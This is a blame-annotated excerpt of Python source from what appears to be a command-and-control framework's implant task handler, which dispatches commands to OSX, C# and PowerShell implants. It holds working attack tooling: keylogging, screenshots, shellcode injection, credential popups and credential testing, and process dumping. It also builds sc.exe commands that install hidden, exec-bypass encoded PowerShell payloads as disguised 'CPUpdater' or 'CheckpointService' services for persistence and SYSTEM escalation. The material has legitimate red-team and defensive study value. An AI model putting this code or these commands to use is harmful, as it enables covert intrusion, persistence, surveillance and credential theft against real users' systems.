if 'unable to open database file' in e:
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user)
|
2018-10-27 18:50:47 +00:00
|
|
|
else:
|
|
|
|
traceback.print_exc()
|
|
|
|
print ("Error: %s" % e)
|
|
|
|
print ("Currently no valid implants: sleeping for 10 seconds")
|
|
|
|
time.sleep(10)
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
2018-12-27 12:10:46 +00:00
|
|
|
def runcommand(command, randomuri):
|
2018-07-23 08:55:15 +00:00
|
|
|
if command:
|
|
|
|
try:
|
|
|
|
last = get_lastcommand()
|
|
|
|
if last:
|
|
|
|
if last != command:
|
|
|
|
new_commandhistory(command)
|
|
|
|
else:
|
|
|
|
new_commandhistory(command)
|
|
|
|
except Exception as e:
|
|
|
|
ExError = e
|
|
|
|
|
|
|
|
implant_type = get_implanttype(randomuri)
|
2018-12-27 12:10:46 +00:00
|
|
|
if implant_type == "OSX":
|
2019-02-03 19:50:40 +00:00
|
|
|
|
|
|
|
# alias mapping
|
|
|
|
for alias in py_alias:
|
|
|
|
if alias[0] == command.lower()[:len(command.rstrip())]:
|
|
|
|
command = alias[1]
|
|
|
|
|
2018-10-30 13:12:40 +00:00
|
|
|
if 'beacon' in command.lower() or 'set-beacon' in command.lower() or 'setbeacon' in command.lower():
|
2019-02-12 21:33:46 +00:00
|
|
|
new_sleep = command.replace('set-beacon ', '')
|
2019-02-13 09:29:20 +00:00
|
|
|
new_sleep = new_sleep.replace('setbeacon ', '')
|
|
|
|
new_sleep = new_sleep.replace('beacon ', '')
|
2019-02-12 21:33:46 +00:00
|
|
|
if not validate_sleep_time(new_sleep):
|
|
|
|
print(Colours.RED)
|
|
|
|
print("Invalid sleep command, please specify a time such as 50s, 10m or 1h")
|
|
|
|
print(Colours.GREEN)
|
|
|
|
else:
|
|
|
|
command = '$sleeptime = %s' % new_sleep
|
|
|
|
new_task(command, user, randomuri)
|
|
|
|
update_sleep(new_sleep, randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
2018-12-31 11:15:13 +00:00
|
|
|
elif (command.lower().startswith('label-implant')):
|
|
|
|
label = command.replace('label-implant ', '')
|
|
|
|
update_label(label, randomuri)
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user)
|
2018-12-31 11:15:13 +00:00
|
|
|
|
2018-09-04 08:46:04 +00:00
|
|
|
elif "searchhelp" in command.lower():
|
|
|
|
searchterm = (command.lower()).replace("searchhelp ","")
|
|
|
|
import string
|
|
|
|
helpfull = string.split(py_help1, '\n')
|
|
|
|
for line in helpfull:
|
2019-02-12 17:34:21 +00:00
|
|
|
if searchterm in line.lower():
|
2018-10-27 18:50:47 +00:00
|
|
|
print (line)
|
2018-09-04 18:30:59 +00:00
|
|
|
|
|
|
|
elif "unhide-implant" in command.lower():
|
|
|
|
unhide_implant(randomuri)
|
|
|
|
|
|
|
|
elif "hide-implant" in command.lower():
|
|
|
|
kill_implant(randomuri)
|
|
|
|
|
2018-09-03 16:51:21 +00:00
|
|
|
elif command.lower() == 'sai' or command.lower() == 'sai ':
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task('startanotherimplant', user, randomuri)
|
2018-08-14 22:40:35 +00:00
|
|
|
|
2018-09-03 19:33:38 +00:00
|
|
|
elif "upload-file" in command.lower():
|
|
|
|
source = ""
|
|
|
|
destination = ""
|
2019-01-05 21:21:40 +00:00
|
|
|
s = ""
|
2019-01-05 12:54:49 +00:00
|
|
|
if command.strip().lower() == "upload-file":
|
|
|
|
source = readfile_with_completion("Location of file to upload: ")
|
|
|
|
while not os.path.isfile(source):
|
|
|
|
print("File does not exist: %s" % source)
|
|
|
|
source = readfile_with_completion("Location of file to upload: ")
|
|
|
|
destination = raw_input("Location to upload to: ")
|
|
|
|
else:
|
|
|
|
args = argp(command)
|
|
|
|
source = args.source
|
|
|
|
destination = args.destination
|
2018-09-03 19:33:38 +00:00
|
|
|
try:
|
2019-01-05 12:54:49 +00:00
|
|
|
with open(source, "rb") as source_file:
|
|
|
|
s = source_file.read()
|
2018-09-03 19:33:38 +00:00
|
|
|
if s:
|
2019-01-05 21:21:40 +00:00
|
|
|
sourceb64 = base64.b64encode(s)
|
2019-01-05 12:54:49 +00:00
|
|
|
destination = destination.replace("\\","\\\\")
|
2018-10-27 18:50:47 +00:00
|
|
|
print ("")
|
2019-01-05 21:24:06 +00:00
|
|
|
print ("Uploading %s to %s" % (source, destination))
|
2019-01-05 21:21:40 +00:00
|
|
|
uploadcommand = "upload-file \"%s\":%s" % (destination, sourceb64)
|
2019-02-11 22:06:33 +00:00
|
|
|
new_task(uploadcommand, user, randomuri)
|
2019-01-05 12:54:49 +00:00
|
|
|
else:
|
|
|
|
print("Source file could not be read or was empty")
|
2018-09-03 19:33:38 +00:00
|
|
|
except Exception as e:
|
2018-10-27 18:50:47 +00:00
|
|
|
print ("Error with source file: %s" % e )
|
2018-12-27 12:10:46 +00:00
|
|
|
traceback.print_exc()
|
2018-09-03 19:33:38 +00:00
|
|
|
|
2018-09-04 08:46:04 +00:00
|
|
|
elif command.lower() == "help" or command == "?" or command.lower() == "help ":
|
2018-10-27 18:50:47 +00:00
|
|
|
print (py_help1)
|
2018-09-04 08:46:04 +00:00
|
|
|
|
|
|
|
elif "loadmoduleforce" in command.lower():
|
|
|
|
params = re.compile("loadmoduleforce ", re.IGNORECASE)
|
|
|
|
params = params.sub("", command)
|
2019-02-11 17:05:14 +00:00
|
|
|
check_module_loaded(params, randomuri, user, force=True)
|
2018-09-04 08:46:04 +00:00
|
|
|
|
|
|
|
elif "loadmodule" in command.lower():
|
|
|
|
params = re.compile("loadmodule ", re.IGNORECASE)
|
|
|
|
params = params.sub("", command)
|
2019-02-11 17:05:14 +00:00
|
|
|
check_module_loaded(params, randomuri, user)
|
2018-09-04 08:46:04 +00:00
|
|
|
|
2018-08-03 21:47:56 +00:00
|
|
|
elif 'get-screenshot' in command.lower():
|
|
|
|
taskcmd = "screencapture -x /tmp/s;base64 /tmp/s;rm /tmp/s"
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task(taskcmd, user, randomuri)
|
2018-08-03 21:47:56 +00:00
|
|
|
|
2018-08-15 10:56:08 +00:00
|
|
|
elif "kill-implant" in command.lower() or "exit" in command.lower():
|
|
|
|
impid = get_implantdetails(randomuri)
|
|
|
|
ri = raw_input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid[0])
|
|
|
|
if ri.lower() == "n":
|
2018-10-27 18:50:47 +00:00
|
|
|
print ("Implant not terminated")
|
2018-08-15 10:56:08 +00:00
|
|
|
if ri == "":
|
|
|
|
pid = get_pid(randomuri)
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task("kill -9 %s" % pid, user, randomuri)
|
2018-08-15 10:56:08 +00:00
|
|
|
kill_implant(randomuri)
|
|
|
|
if ri.lower() == "y":
|
|
|
|
pid = get_pid(randomuri)
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task("kill -9 %s" % pid, user, randomuri)
|
2018-08-15 10:56:08 +00:00
|
|
|
kill_implant(randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "):
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user)
|
2019-01-13 16:16:09 +00:00
|
|
|
|
|
|
|
elif "linuxprivchecker" in command.lower():
|
|
|
|
params = re.compile("linuxprivchecker", re.IGNORECASE)
|
|
|
|
params = params.sub("", command)
|
|
|
|
module = open("%slinuxprivchecker.py" % ModulesDirectory, 'r').read()
|
|
|
|
encoded_module = base64.b64encode(module)
|
|
|
|
taskcmd = "linuxprivchecker -pycode %s %s" % (encoded_module, params)
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task(taskcmd, user, randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
else:
|
|
|
|
if command:
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task(command, user, randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
return
|
|
|
|
|
2018-12-27 12:10:46 +00:00
|
|
|
elif implant_type == "C#":
|
2018-12-30 23:52:39 +00:00
|
|
|
try:
|
2019-02-11 21:00:56 +00:00
|
|
|
check_module_loaded("Stage2-Core.exe", randomuri, user)
|
2018-12-30 23:52:39 +00:00
|
|
|
except Exception as e:
|
2019-02-11 21:00:56 +00:00
|
|
|
print ("Error loading Stage2-Core.exe: %s" % e)
|
2019-02-03 19:50:40 +00:00
|
|
|
|
|
|
|
# alias mapping
|
|
|
|
for alias in cs_alias:
|
|
|
|
if alias[0] == command.lower()[:len(command.rstrip())]:
|
|
|
|
command = alias[1]
|
2018-12-30 23:52:39 +00:00
|
|
|
|
2018-12-27 12:10:46 +00:00
|
|
|
if "searchhelp" in command.lower():
|
|
|
|
searchterm = (command.lower()).replace("searchhelp ","")
|
|
|
|
import string
|
|
|
|
helpfull = string.split(sharp_help1, '\n')
|
|
|
|
for line in helpfull:
|
2019-02-12 17:34:21 +00:00
|
|
|
if searchterm in line.lower():
|
2018-12-27 12:10:46 +00:00
|
|
|
print (line)
|
2018-12-31 17:22:58 +00:00
|
|
|
|
|
|
|
elif "upload-file" in command.lower():
|
|
|
|
source = ""
|
|
|
|
destination = ""
|
2019-01-05 21:21:40 +00:00
|
|
|
s = ""
|
2019-01-05 12:54:49 +00:00
|
|
|
if command.strip().lower() == "upload-file":
|
|
|
|
source = readfile_with_completion("Location of file to upload: ")
|
|
|
|
while not os.path.isfile(source):
|
|
|
|
print("File does not exist: %s" % source)
|
|
|
|
source = readfile_with_completion("Location of file to upload: ")
|
|
|
|
destination = raw_input("Location to upload to: ")
|
|
|
|
else:
|
|
|
|
args = argp(command)
|
|
|
|
source = args.source
|
|
|
|
destination = args.destination
|
2018-12-31 17:22:58 +00:00
|
|
|
try:
|
2019-01-05 12:54:49 +00:00
|
|
|
with open(source, "rb") as source_file:
|
|
|
|
s = source_file.read()
|
2018-12-31 17:22:58 +00:00
|
|
|
if s:
|
2019-01-05 21:21:40 +00:00
|
|
|
sourceb64 = base64.b64encode(s)
|
2019-01-05 12:54:49 +00:00
|
|
|
destination = destination.replace("\\","\\\\")
|
2018-12-31 17:22:58 +00:00
|
|
|
print ("")
|
2019-01-05 12:54:49 +00:00
|
|
|
print ("Uploading %s to %s" % (source, destination))
|
2019-01-05 21:21:40 +00:00
|
|
|
uploadcommand = "upload-file%s;\"%s\"" % (sourceb64, destination)
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task(uploadcommand, user, randomuri)
|
2019-01-05 12:54:49 +00:00
|
|
|
else:
|
|
|
|
print("Source file could not be read or was empty")
|
2018-12-31 17:22:58 +00:00
|
|
|
except Exception as e:
|
2019-01-05 12:54:49 +00:00
|
|
|
print ("Error with source file: %s" % e )
|
2018-12-31 17:22:58 +00:00
|
|
|
traceback.print_exc()
|
2019-01-05 12:54:49 +00:00
|
|
|
|
2018-12-27 12:10:46 +00:00
|
|
|
elif "unhide-implant" in command.lower():
|
|
|
|
unhide_implant(randomuri)
|
|
|
|
|
|
|
|
elif "hide-implant" in command.lower():
|
|
|
|
kill_implant(randomuri)
|
|
|
|
|
2019-02-16 18:59:42 +00:00
|
|
|
elif "safetydump" in command.lower():
|
|
|
|
check_module_loaded("SafetyDump.exe", randomuri, user)
|
|
|
|
new_task(command, user, randomuri)
|
|
|
|
|
2018-12-28 22:59:54 +00:00
|
|
|
elif "inject-shellcode" in command.lower():
|
2018-12-30 23:52:39 +00:00
|
|
|
params = re.compile("inject-shellcode", re.IGNORECASE)
|
|
|
|
params = params.sub("", command)
|
2019-01-05 12:54:49 +00:00
|
|
|
path = readfile_with_completion("Location of shellcode file: ")
|
2018-12-28 22:59:54 +00:00
|
|
|
try:
|
|
|
|
shellcodefile = load_file(path)
|
|
|
|
if shellcodefile != None:
|
|
|
|
arch = "64"
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task("run-exe Core.Program Core Inject-Shellcode %s%s" % (base64.b64encode(shellcodefile),params), user, randomuri)
|
2018-12-28 22:59:54 +00:00
|
|
|
except Exception as e:
|
|
|
|
print ("Error loading file: %s" % e)
|
|
|
|
|
2018-12-27 12:10:46 +00:00
|
|
|
elif "kill-implant" in command.lower() or "exit" in command.lower():
|
|
|
|
impid = get_implantdetails(randomuri)
|
|
|
|
ri = raw_input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid[0])
|
|
|
|
if ri.lower() == "n":
|
|
|
|
print ("Implant not terminated")
|
|
|
|
if ri == "":
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task("exit", user, randomuri)
|
2018-12-27 12:10:46 +00:00
|
|
|
kill_implant(randomuri)
|
|
|
|
if ri.lower() == "y":
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task("exit",user, randomuri)
|
2018-12-27 12:10:46 +00:00
|
|
|
kill_implant(randomuri)
|
2018-12-30 23:52:39 +00:00
|
|
|
|
2018-12-27 13:35:38 +00:00
|
|
|
elif "seatbelt " in command.lower():
|
2019-02-11 17:05:14 +00:00
|
|
|
check_module_loaded("Seatbelt.exe", randomuri, user)
|
|
|
|
new_task(command, user, randomuri)
|
2018-12-29 12:17:35 +00:00
|
|
|
|
2019-01-03 18:26:06 +00:00
|
|
|
elif (command.lower().startswith("stop-keystrokes")):
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
|
2019-01-03 18:26:06 +00:00
|
|
|
|
|
|
|
elif (command.lower().startswith("get-keystrokes")):
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
|
2019-01-03 18:26:06 +00:00
|
|
|
|
2019-01-04 10:00:46 +00:00
|
|
|
elif (command.lower().startswith("get-screenshotmulti")):
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task(command, user, randomuri)
|
2019-01-04 10:00:46 +00:00
|
|
|
|
2018-12-31 00:21:29 +00:00
|
|
|
elif (command.lower().startswith("get-screenshot")):
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
|
2018-12-31 00:21:29 +00:00
|
|
|
|
2018-12-30 23:52:39 +00:00
|
|
|
elif (command.lower().startswith("arpscan")):
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
|
2018-12-30 23:52:39 +00:00
|
|
|
|
|
|
|
elif (command.lower().startswith("testadcredential")):
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
|
2018-12-30 23:52:39 +00:00
|
|
|
|
|
|
|
elif (command.lower().startswith("testlocalcredential")):
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
|
2018-12-30 23:52:39 +00:00
|
|
|
|
|
|
|
elif (command.lower().startswith("turtle")):
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
|
2019-01-06 18:09:07 +00:00
|
|
|
|
|
|
|
elif (command.lower().startswith("get-userinfo")):
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
|
2018-12-30 23:52:39 +00:00
|
|
|
|
2018-12-31 00:39:09 +00:00
|
|
|
elif (command.lower().startswith("get-content")):
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
|
2018-12-31 00:39:09 +00:00
|
|
|
|
2018-12-30 23:52:39 +00:00
|
|
|
elif (command.lower().startswith("resolvednsname")):
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
|
2018-12-30 23:52:39 +00:00
|
|
|
|
|
|
|
elif (command.lower().startswith("resolveip")):
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
|
2018-12-30 23:52:39 +00:00
|
|
|
|
2018-12-31 00:27:44 +00:00
|
|
|
elif (command.lower().startswith("cred-popper")):
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
|
2018-12-30 23:52:39 +00:00
|
|
|
|
|
|
|
elif (command.lower().startswith("get-serviceperms")):
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
|
2019-01-02 16:10:52 +00:00
|
|
|
|
|
|
|
elif (command.lower().startswith("move")):
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
|
2019-01-02 16:10:52 +00:00
|
|
|
|
|
|
|
elif (command.lower().startswith("delete")):
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
|
2018-12-30 23:52:39 +00:00
|
|
|
|
|
|
|
elif (command.lower().startswith("ls")):
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
|
2018-12-30 23:52:39 +00:00
|
|
|
|
|
|
|
elif (command.lower() == "pwd") or (command.lower() == "pwd "):
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task("run-exe Core.Program Core pwd", user, randomuri)
|
2018-12-29 12:29:52 +00:00
|
|
|
|
2018-12-27 12:10:46 +00:00
|
|
|
elif (command.lower() == "ps") or (command.lower() == "ps "):
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task("run-exe Core.Program Core Get-ProcessList", user, randomuri)
|
2018-12-27 12:10:46 +00:00
|
|
|
|
|
|
|
elif "loadmoduleforce" in command.lower():
|
|
|
|
params = re.compile("loadmoduleforce ", re.IGNORECASE)
|
|
|
|
params = params.sub("", command)
|
2019-02-11 17:05:14 +00:00
|
|
|
check_module_loaded(params, randomuri, user, force=True)
|
2018-12-27 12:10:46 +00:00
|
|
|
|
|
|
|
elif "loadmodule" in command.lower():
|
|
|
|
params = re.compile("loadmodule ", re.IGNORECASE)
|
|
|
|
params = params.sub("", command)
|
2019-02-11 17:05:14 +00:00
|
|
|
check_module_loaded(params, randomuri, user)
|
2018-12-29 12:37:32 +00:00
|
|
|
|
|
|
|
elif "listmodules" in command.lower():
|
|
|
|
modules = os.listdir("%s/Modules/" % POSHDIR)
|
2018-12-29 12:47:57 +00:00
|
|
|
print ("")
|
|
|
|
print ("[+] Available modules:")
|
|
|
|
print ("")
|
2018-12-29 12:37:32 +00:00
|
|
|
for mod in modules:
|
2018-12-29 12:42:58 +00:00
|
|
|
if (".exe" in mod) or (".dll" in mod) :
|
2018-12-29 12:37:32 +00:00
|
|
|
print (mod)
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task(command, user, randomuri)
|
2018-12-29 12:37:32 +00:00
|
|
|
|
|
|
|
elif "modulesloaded" in command.lower():
|
|
|
|
ml = get_implantdetails(randomuri)
|
|
|
|
print (ml[14])
|
2018-12-27 12:10:46 +00:00
|
|
|
|
|
|
|
elif command.lower() == "help" or command == "?" or command.lower() == "help ":
|
|
|
|
print (sharp_help1)
|
|
|
|
|
|
|
|
elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "):
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user)
|
2018-12-27 12:10:46 +00:00
|
|
|
|
|
|
|
elif ('beacon' in command.lower() and '-beacon' not in command.lower()) or 'set-beacon' in command.lower() or 'setbeacon' in command.lower():
|
2019-02-12 21:33:46 +00:00
|
|
|
new_sleep = command.replace('set-beacon ', '')
|
2019-02-13 09:29:20 +00:00
|
|
|
new_sleep = new_sleep.replace('setbeacon ', '')
|
|
|
|
new_sleep = new_sleep.replace('beacon ', '')
|
2019-02-12 21:33:46 +00:00
|
|
|
if not validate_sleep_time(new_sleep):
|
|
|
|
print(Colours.RED)
|
|
|
|
print("Invalid sleep command, please specify a time such as 50s, 10m or 1h")
|
|
|
|
print(Colours.GREEN)
|
|
|
|
else:
|
|
|
|
new_task(command, user, randomuri)
|
|
|
|
update_sleep(new_sleep, randomuri)
|
|
|
|
|
2018-12-31 11:15:13 +00:00
|
|
|
elif (command.lower().startswith('label-implant')):
|
|
|
|
label = command.replace('label-implant ', '')
|
|
|
|
update_label(label, randomuri)
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user)
|
2018-12-27 12:10:46 +00:00
|
|
|
|
|
|
|
else:
|
|
|
|
if command:
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task(command, user, randomuri)
|
2018-12-27 12:10:46 +00:00
|
|
|
return
|
|
|
|
|
2018-07-23 08:55:15 +00:00
|
|
|
else:
|
|
|
|
try:
|
2019-02-11 21:00:56 +00:00
|
|
|
check_module_loaded("Stage2-Core.ps1", randomuri, user)
|
2018-07-23 08:55:15 +00:00
|
|
|
except Exception as e:
|
2019-02-11 21:00:56 +00:00
|
|
|
print ("Error loading Stage2-Core.ps1: %s" % e)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
2019-02-11 17:05:14 +00:00
|
|
|
run_autoloads(command, randomuri, user)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
2019-02-03 19:50:40 +00:00
|
|
|
# alias mapping
|
|
|
|
for alias in ps_alias:
|
|
|
|
if alias[0] == command.lower()[:len(command.rstrip())]:
|
|
|
|
command = alias[1]
|
|
|
|
|
|
|
|
# opsec failures
|
|
|
|
for opsec in ps_opsec:
|
|
|
|
if opsec == command.lower()[:len(opsec)]:
|
2019-03-03 18:22:40 +00:00
|
|
|
print (Colours.RED)
|
|
|
|
print ("**OPSEC Warning**")
|
2019-02-03 19:50:40 +00:00
|
|
|
impid = get_implantdetails(randomuri)
|
|
|
|
ri = raw_input("Do you want to continue running - %s? (y/N) " % command)
|
|
|
|
if ri.lower() == "n":
|
|
|
|
command = ""
|
|
|
|
if ri == "":
|
|
|
|
command = ""
|
|
|
|
if ri.lower() == "y":
|
|
|
|
command = command
|
|
|
|
|
2018-10-30 13:12:40 +00:00
|
|
|
if ('beacon' in command.lower() and '-beacon' not in command.lower()) or 'set-beacon' in command.lower() or 'setbeacon' in command.lower():
|
2019-02-12 21:33:46 +00:00
|
|
|
new_sleep = command.replace('set-beacon ', '')
|
2019-02-13 09:29:20 +00:00
|
|
|
new_sleep = new_sleep.replace('setbeacon ', '')
|
|
|
|
new_sleep = new_sleep.replace('beacon ', '')
|
2019-02-12 21:33:46 +00:00
|
|
|
if not validate_sleep_time(new_sleep):
|
|
|
|
print(Colours.RED)
|
|
|
|
print("Invalid sleep command, please specify a time such as 50s, 10m or 1h")
|
|
|
|
print(Colours.GREEN)
|
|
|
|
else:
|
|
|
|
new_task(command, user, randomuri)
|
|
|
|
update_sleep(new_sleep, randomuri)
|
2018-08-09 09:40:35 +00:00
|
|
|
|
2018-12-31 11:15:13 +00:00
|
|
|
elif (command.lower().startswith('label-implant')):
|
|
|
|
label = command.replace('label-implant ', '')
|
|
|
|
update_label(label, randomuri)
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user)
|
2018-12-31 11:15:13 +00:00
|
|
|
|
2018-08-09 09:40:35 +00:00
|
|
|
elif "searchhelp" in command.lower():
|
|
|
|
searchterm = (command.lower()).replace("searchhelp ","")
|
|
|
|
import string
|
|
|
|
helpfull = string.split(posh_help, '\n')
|
|
|
|
for line in helpfull:
|
2019-02-12 17:34:21 +00:00
|
|
|
if searchterm in line.lower():
|
2018-10-27 18:50:47 +00:00
|
|
|
print (line)
|
2018-08-09 09:40:35 +00:00
|
|
|
|
2018-07-23 08:55:15 +00:00
|
|
|
elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "):
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
elif "install-servicelevel-persistencewithproxy" in command.lower():
|
|
|
|
C2 = get_c2server_all()
|
|
|
|
if C2[11] == "":
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user, "Need to run createproxypayload first")
|
2018-07-23 08:55:15 +00:00
|
|
|
else:
|
2018-12-27 12:10:46 +00:00
|
|
|
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
|
2018-07-23 08:55:15 +00:00
|
|
|
C2[13], C2[11], "", "", C2[19], C2[20],
|
|
|
|
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
|
|
|
|
payload = newPayload.CreateRawBase()
|
2018-12-27 12:10:46 +00:00
|
|
|
cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload)
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task(cmd, user, randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
elif "install-servicelevel-persistence" in command.lower():
|
|
|
|
C2 = get_c2server_all()
|
2018-12-27 12:10:46 +00:00
|
|
|
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
|
2018-07-23 08:55:15 +00:00
|
|
|
"", "", "", "", C2[19], C2[20],
|
|
|
|
C2[21], get_newimplanturl(), PayloadsDirectory)
|
|
|
|
payload = newPayload.CreateRawBase()
|
2018-12-27 12:10:46 +00:00
|
|
|
cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload)
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task(cmd, user, randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
elif "remove-servicelevel-persistence" in command.lower():
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task("sc.exe delete CPUpdater", user, randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
# psexec lateral movement
|
|
|
|
elif "get-implantworkingdirectory" in command.lower():
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task("pwd", user, randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
elif "get-system-withproxy" in command.lower():
|
|
|
|
C2 = get_c2server_all()
|
|
|
|
if C2[11] == "":
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user, "Need to run createproxypayload first")
|
2018-07-23 08:55:15 +00:00
|
|
|
else:
|
2018-12-27 12:10:46 +00:00
|
|
|
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
|
2018-07-23 08:55:15 +00:00
|
|
|
C2[13], C2[11], "", "", C2[19], C2[20],
|
|
|
|
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
|
|
|
|
payload = newPayload.CreateRawBase()
|
|
|
|
cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceModule start= auto" % payload
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task(cmd, user, randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
cmd = "sc.exe start CPUpdaterMisc"
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task(cmd, user, randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
cmd = "sc.exe delete CPUpdaterMisc"
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task(cmd, user, randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
elif "get-system-withdaisy" in command.lower():
|
|
|
|
C2 = get_c2server_all()
|
|
|
|
daisyname = raw_input("Payload name required: ")
|
2018-12-27 12:10:46 +00:00
|
|
|
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
|
2018-07-23 08:55:15 +00:00
|
|
|
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read()
|
|
|
|
cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c %s' Displayname= CheckpointServiceModule start= auto" % payload
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task(cmd, user, randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
cmd = "sc.exe start CPUpdaterMisc"
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task(cmd, user, randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
cmd = "sc.exe delete CPUpdaterMisc"
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task(cmd, user, randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
elif "get-system" in command.lower():
|
|
|
|
C2 = get_c2server_all()
|
2018-12-27 12:10:46 +00:00
|
|
|
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
|
2018-07-23 08:55:15 +00:00
|
|
|
"", "", "", "", C2[19], C2[20],
|
|
|
|
C2[21], get_newimplanturl(), PayloadsDirectory)
|
|
|
|
payload = newPayload.CreateRawBase()
|
|
|
|
cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceModule start= auto" % payload
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task(cmd, user, randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
cmd = "sc.exe start CPUpdaterMisc"
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task(cmd, user, randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
cmd = "sc.exe delete CPUpdaterMisc"
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task(cmd, user, randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
elif "quit" in command.lower():
|
|
|
|
ri = raw_input("Are you sure you want to quit? (Y/n) ")
|
|
|
|
if ri.lower() == "n":
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user)
|
